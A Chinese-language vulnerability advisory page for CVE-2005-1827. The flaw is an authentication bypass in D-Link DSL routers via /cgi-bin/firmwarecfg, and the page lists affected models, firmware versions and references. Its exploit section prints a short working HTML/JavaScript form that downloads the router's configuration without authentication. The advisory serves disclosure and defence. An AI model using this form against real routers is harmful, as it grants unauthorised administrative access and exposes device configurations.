CVE-2005-1827
CVSS7.5
发布时间 :2005-05-26 00:00:00
修订时间 :2016-10-17 23:22:44
NMCS    

[原文]D-Link DSL-504T allows remote attackers to bypass authentication and gain privileges, such as upgrade firmware, restart the router or restore a saved configuration, via a direct request to firmwarecfg.


[CNNVD]D-Link DSL路由器可绕过访问认证漏洞(CNNVD-200505-1215)

        D-Link DSL路由器是家庭和小型办公室常用的路由器。
        D-Link DSL路由器对用户访问的认证存在问题,远程攻击者可能利用此漏洞非授权访问设备。
        在执行CGI /cgi-bin/firmwarecfg时,脚本会检查在/var/tmp/中是否存在fw_ip文件。如果存在这个文件的话,就会允许其中列出的所有IP地址无需认证直接访问设备。如果不存在这个文件的话,CGI就会创建一个新文件,在其中写入请求地址。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1827
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1827
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1215
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111722515805478&w=2
(UNKNOWN)  BUGTRAQ  20050526 DSL-504T (and maybe many other) remote access without password bug
http://www.securityfocus.com/bid/13679
(UNKNOWN)  BID  13679

- 漏洞信息

D-Link DSL路由器可绕过访问认证漏洞
高危 访问验证错误
2005-05-26 00:00:00 2005-10-20 00:00:00
远程  
        D-Link DSL路由器是家庭和小型办公室常用的路由器。
        D-Link DSL路由器对用户访问的认证存在问题,远程攻击者可能利用此漏洞非授权访问设备。
        在执行CGI /cgi-bin/firmwarecfg时,脚本会检查在/var/tmp/中是否存在fw_ip文件。如果存在这个文件的话,就会允许其中列出的所有IP地址无需认证直接访问设备。如果不存在这个文件的话,CGI就会创建一个新文件,在其中写入请求地址。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.dlink.com/

- 漏洞信息

D-Link DSL Router Remote Authentication Bypass Vulnerability
Access Validation Error 13679
Yes No
2005-05-19 12:00:00 2011-12-20 12:19:00
Francesco Orro <francesco.orro@akhela.com> is credited with the discovery of this vulnerability.

- 受影响的程序版本

Punto ADSL Aethra Starbridge E-U
ECI Telecom B-FOCuS Router 312+
ECI Telecom B-FOCuS MultiPort 342+
ECI Telecom B-FOCuS Combo 322+
D-Link DSL-G604T
D-Link DSL-562T
D-Link DSL-504T
D-Link DSL-502T
D-Link DSL-500T V1.00B02T02.RU.20050

- 漏洞讨论

Various D-Link DSL routers are susceptible to a remote authentication bypass vulnerability. This issue is due to a failure of the devices to require authentication in certain circumstances.

This vulnerability allows remote attackers to gain complete administrative access to affected devices.

Various D-Link devices with the following firmware revisions are affected by this issue:
- V1.00B01T16.EN.20040211
- V1.00B01T16.EU.20040217
- V0.00B01T04.UK.20040220
- V1.00B01T16.EN.20040226
- V1.00B02T02.EU.20040610
- V1.00B02T02.UK.20040618
- V1.00B02T02.EU.20040729
- V1.00B02T02.DE.20040813
- V1.00B02T02.RU.20041014

Due to the common practice of code reuse, other devices are also likely affected by this issue.

- 漏洞利用

An exploit is not required. The following HTML form example is sufficient to demonstrate this vulnerability:

&lt;html&gt;&lt;head&gt;Download config.xml:&lt;title&gt;GetConfig - Config file
download&lt;/title&gt;&lt;/head&gt;&lt;body&gt;

&lt;script lang="javascript"&gt;
function invia_richiesta()
{
document.DownloadConfig.action='http://'+document.InputBox.Host.value+'/cgi-bin/firmwarecfg';
document.DownloadConfig.submit();
}
&lt;/script&gt;

&lt;form name="InputBox"&gt;
&lt;br&gt;http://&lt;input Name="Host" type="text" value=""&gt;/cgi-bin/firmwarecfg&lt;br&gt;
&lt;/form&gt;
&lt;form name="DownloadConfig" method="POST" action=""
enctype="multipart/form-data"&gt;
&lt;input type="Submit" name="config" value="Download"
onClick="javascript:invia_richiesta();"&gt;&lt;br&gt;
&lt;/form&gt;&lt;/body&gt;&lt;/html&gt;

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站